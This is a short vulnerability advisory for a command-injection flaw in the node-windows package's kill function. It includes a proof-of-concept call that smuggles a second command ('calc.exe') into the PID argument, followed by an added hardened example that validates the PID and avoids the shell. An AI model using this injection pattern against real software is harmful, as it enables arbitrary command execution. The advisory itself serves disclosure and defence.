CVE-2021-45459: OS Command Injection in node-windows


Description

lib/cmd.js in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.

Proof of Concept

// poc.js
var wincmd = require('node-windows');

wincmd.kill("12345; calc.exe", function(){
    console.log('Process Killed');
});
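
One way to close this class of bug, shown as an added example that is not the node-windows source or its actual fix: validate the PID as a bounded integer and hand it to `execFile` as a separate argument instead of concatenating it into a command string. The helper names `parsePid`, `buildKillArgs` and `safeKill`, and the use of `taskkill` as the underlying command, are assumptions made for illustration.

```javascript
// Added example (not node-windows code): reject non-numeric PIDs and avoid the shell.
const { execFile } = require('child_process');

// Hypothetical helper: accept only a positive integer that fits a Windows DWORD.
function parsePid(pid) {
  // Strings must be plain decimal digits with no sign, spaces or separators.
  const n = (typeof pid === 'string' && /^[1-9][0-9]{0,9}$/.test(pid))
    ? Number(pid)
    : pid;
  if (typeof n !== 'number' || !Number.isInteger(n) || n <= 0 || n > 0xFFFFFFFF) {
    throw new TypeError('PID must be a positive integer');
  }
  return n;
}

// Hypothetical helper: build the argument vector; the PID is one argv element.
function buildKillArgs(pid, force) {
  const args = ['/PID', String(parsePid(pid))];
  if (force === true) args.push('/F');
  return args;
}

// Hardened kill: execFile starts the program directly, so no shell parses the
// arguments, and validation failures are reported before any process is spawned.
function safeKill(pid, force, callback) {
  if (typeof force === 'function') {
    callback = force;
    force = false;
  }
  let args;
  try {
    args = buildKillArgs(pid, force);
  } catch (err) {
    return callback(err);
  }
  execFile('taskkill', args, { windowsHide: true }, callback);
}
```

With this check in place, the string used in the proof of concept is rejected with a `TypeError` and no child process is started.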
